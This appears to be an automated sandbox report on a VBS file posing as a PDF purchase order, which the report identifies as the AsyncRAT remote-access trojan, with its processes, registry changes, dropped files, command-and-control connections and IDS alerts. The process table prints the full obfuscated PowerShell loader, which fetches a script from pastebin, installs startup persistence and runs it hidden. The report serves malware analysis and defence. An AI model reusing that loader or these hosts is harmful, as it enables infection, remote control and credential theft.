| File name: | P.O_Fwd Please Quote PO- PN.pdf.vbs |
| Full analysis: | https://app.any.run/tasks/c51dcd83-24a1-40a8-921f-a6e04d857232 |
| Verdict: | Malicious activity |
| Threats: | AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. |
| Analysis date: | April 15, 2021, 14:20:50 |
| OS: | Windows 10 Professional (build: 16299, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines, with CRLF line terminators |
| MD5: | 149B70900B4DCBD9949CF76ECD772D4F |
| SHA1: | 3861945CA2BB145C4F60E6561F6C6816574A9680 |
| SHA256: | 3822EFCF4CC76E1E0E8855D9F9C9AB5C236E118BF14FB004A9F048AA845DE967 |
| SSDEEP: | 96:e074uUrI7T7URmD9pyyxy1yZmxy1ylr49WyyxyLmxyKtmxNRVANmdiRPSkSxykyH:RUr766tiT8D |
MALICIOUS
Steals credentials from Web Browsers
- InstallUtil.exe (PID: 1912)
Writes to a start menu file
- powershell.exe (PID: 4540)
ASYNCRAT was detected
- InstallUtil.exe (PID: 1912)
Actions looks like stealing of personal data
- InstallUtil.exe (PID: 1912)
SUSPICIOUS
Executes PowerShell scripts
- WScript.exe (PID: 3416)
- powershell.exe (PID: 4540)
Reads Environment values
- powershell.exe (PID: 4540)
Checks supported languages
- SystemSettings.exe (PID: 5056)
Executed via COM
- RuntimeBroker.exe (PID: 3772)
- ApplicationFrameHost.exe (PID: 548)
- SystemSettings.exe (PID: 5056)
- backgroundTaskHost.exe (PID: 1292)
- SpeechRuntime.exe (PID: 1168)
Creates files in the user directory
- SystemSettings.exe (PID: 5056)
- powershell.exe (PID: 4540)
Loads DLL from Mozilla Firefox
- InstallUtil.exe (PID: 1912)
Application launched itself
- powershell.exe (PID: 4540)
INFO
Reads settings of System Certificates
- powershell.exe (PID: 4540)
- InstallUtil.exe (PID: 1912)
- powershell.exe (PID: 2604)
Reads the software policy settings
- powershell.exe (PID: 4540)
- powershell.exe (PID: 2604)
- InstallUtil.exe (PID: 1912)
Checks supported languages
- backgroundTaskHost.exe (PID: 1292)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
92
Monitored processes
12
Malicious processes
4
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 548 | C:\WINDOWS\system32\ApplicationFrameHost.exe -Embedding | C:\WINDOWS\system32\ApplicationFrameHost.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Application Frame Host Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1168 | C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding | C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Speech Runtime Executable Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1292 | "C:\WINDOWS\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca | C:\WINDOWS\system32\backgroundTaskHost.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Background Task Host Exit code: 1 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1912 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: .NET Framework installation utility Exit code: 0 Version: 4.7.2556.0 built by: NET471REL1 Modules
| |||||||||||||||
| 2604 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\admin\AppData\Local\Temp\SysTray.PS1 | C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3416 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\Desktop\P.O_Fwd Please Quote PO- PN.pdf.vbs" | C:\WINDOWS\System32\WScript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 3772 | C:\Windows\System32\RuntimeBroker.exe -Embedding | C:\Windows\System32\RuntimeBroker.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Runtime Broker Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4228 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES8E93.tmp" "c:\Users\admin\AppData\Local\Temp\CSCC914F53308647F7BA33CB4C83C5DE48.TMP" | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 12.00.52519.0 built by: VSWINSERVICING Modules
| |||||||||||||||
| 4500 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\WINDOWS\system32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4540 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WINDOWSTYLE HIDDEN -EXECUTIONPOLICY UNRESTRICTED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(35,82,101,97,100,32,67,111,110,116,101,110,116,32,79,102,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,93,32,36,83,116,114,101,97,109,32,61,32,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,79,112,101,110,82,101,97,100,40,34,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,89,54,49,117,69,51,83,52,34,41,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,93,32,36,83,82,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,32,36,83,116,114,101,97,109,13,10,91,83,116,114,105,110,103,93,32,36,82,101,113,32,61,32,36,83,82,46,82,101,97,100,84,111,69,110,100,40,41,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,54,48,48,48,41,13,10,13,10,35,67,114,101,97,116,101,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,79,110,32,72,97,114,100,32,68,105,115,107,32,33,13,10,91,83,116,114,105,110,103,93,32,36,84,69,77,80,32,61,32,36,101,110,118,58,84,69,77,80,32,43,32,34,92,34,32,43,32,34,83,121,115,84,114,97,121,46,80,83,49,34,13,10,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,69,77,80,44,32,36,82,101,113,41,13,10,13,10,35,83,116,97,114,116,117,112,32,73,110,115,116,97,108,108,97,116,105,111,110,13,10,70,117,110,99,116,105,111,110,32,73,78,83,84,65,76,76,40,41,32,123,13,10,32,32,32,32,91,83,116,114,105,110,103,93,32,36,86,66,83,82,117,110,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,68,101,102,97,117,108,116,46,71,101,116,83,116,114,105,110,103,40,64,40,56,51,44,49,48,49,44,49,49,54,44,51,50,44,55,57,44,57,56,44,49,48,54,44,51,50,44,54,49,44,51,50,44,54,55,44,49,49,52,44,49,48,49,44,57,55,44,49,49,54,44,49,48,49,44,55,57,44,57,56,44,49,48,54,44,49,48,49,44,57,57,44,49,49,54,44,52,48,44,51,52,44,56,55,44,56,51,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,52,54,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,52,44,52,49,44,49,51,44,49,48,44,55,57,44,57,56,44,49,48,54,44,52,54,44,56,50,44,49,49,55,44,49,49,48,44,51,50,44,51,52,44,56,48,44,49,49,49,44,49,49,57,44,49,48,49,44,49,49,52,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,50,44,52,53,44,54,57,44,49,50,48,44,49,48,49,44,57,57,44,49,49,55,44,49,49,54,44,49,48,53,44,49,49,49,44,49,49,48,44,56,48,44,49,49,49,44,49,48,56,44,49,48,53,44,57,57,44,49,50,49,44,51,50,44,56,50,44,49,48,49,44,49,48,57,44,49,49,49,44,49,49,54,44,49,48,49,44,56,51,44,49,48,53,44,49,48,51,44,49,49,48,44,49,48,49,44,49,48,48,44,51,50,44,52,53,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,51,50,44,51,52,44,51,50,44,51,56,44,51,50,44,51,52,44,51,55,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,56,48,44,57,55,44,49,49,54,44,49,48,52,44,51,55,44,51,52,44,52,52,44,51,50,44,52,56,41,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,40,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,55,41,32,43,32,34,92,83,121,115,116,101,109,76,111,103,105,110,51,50,66,105,116,115,56,57,46,118,98,115,34,41,44,32,36,86,66,83,82,117,110,46,82,101,112,108,97,99,101,40,34,37,70,105,108,101,80,97,116,104,37,34,44,32,36,84,69,77,80,41,41,13,10,125,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,41,13,10,13,10,35,82,117,110,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,73,78,83,84,65,76,76,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,36,84,69,77,80,34))) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
3 123
Read events
2 986
Write events
136
Delete events
1
Modification events
| (PID) Process: | (3416) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3416) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (3416) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (3416) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (4540) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\1a0\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (548) ApplicationFrameHost.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MrtCache\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri\1d33928e47e02c6\a01460c8 |
| Operation: | write | Name: | LanguageList |
Value: _en-US;en_standard_100_US_LTR_dark_Desktop | |||
| (PID) Process: | (4540) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (4540) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (4540) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (4540) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
Executable files
0
Suspicious files
2
Text files
4
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4540 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_etmitcg5.ofj.ps1 | — | |
MD5:— | SHA256:— | |||
| 4540 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qsogdw5t.40v.psm1 | — | |
MD5:— | SHA256:— | |||
| 5056 | SystemSettings.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PAGDIPZJFBDLBL8WS3D6.temp | — | |
MD5:— | SHA256:— | |||
| 2604 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_w1rr1j0u.xs2.ps1 | — | |
MD5:— | SHA256:— | |||
| 2604 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0qli4u4r.rer.psm1 | — | |
MD5:— | SHA256:— | |||
| 4760 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCC914F53308647F7BA33CB4C83C5DE48.TMP | — | |
MD5:— | SHA256:— | |||
| 4228 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES8E93.tmp | — | |
MD5:— | SHA256:— | |||
| 4760 | csc.exe | C:\Users\admin\AppData\Local\Temp\35xnpndt.dll | — | |
MD5:— | SHA256:— | |||
| 4760 | csc.exe | C:\Users\admin\AppData\Local\Temp\35xnpndt.out | — | |
MD5:— | SHA256:— | |||
| 4540 | powershell.exe | C:\Users\admin\AppData\Local\Temp\SysTray.PS1 | text | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
5
DNS requests
4
Threats
6
HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4540 | powershell.exe | 104.23.99.190:443 | pastebin.com | Cloudflare Inc | US | malicious |
1912 | InstallUtil.exe | 79.134.225.119:8988 | asin8988.ddns.net | Andreas Fink trading as Fink Telecom Services | CH | malicious |
1912 | InstallUtil.exe | 197.210.71.132:8989 | Asin8989.ddns.net | MTN NIGERIA Communication limited | NG | unknown |
1912 | InstallUtil.exe | 197.210.70.107:8988 | asin8988.ddns.net | MTN NIGERIA Communication limited | NG | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
pastebin.com |
| malicious |
asin8988.ddns.net |
| malicious |
Asin8989.ddns.net |
| malicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
1988 | svchost.exe | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.ddns .net |
1912 | InstallUtil.exe | A Network Trojan was detected | REMOTE [PTsecurity] AsyncRAT |
1912 | InstallUtil.exe | A Network Trojan was detected | ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) |
1912 | InstallUtil.exe | A Network Trojan was detected | REMOTE [PTsecurity] AsyncRAT |
1988 | svchost.exe | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.ddns .net |
1988 | svchost.exe | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.ddns .net |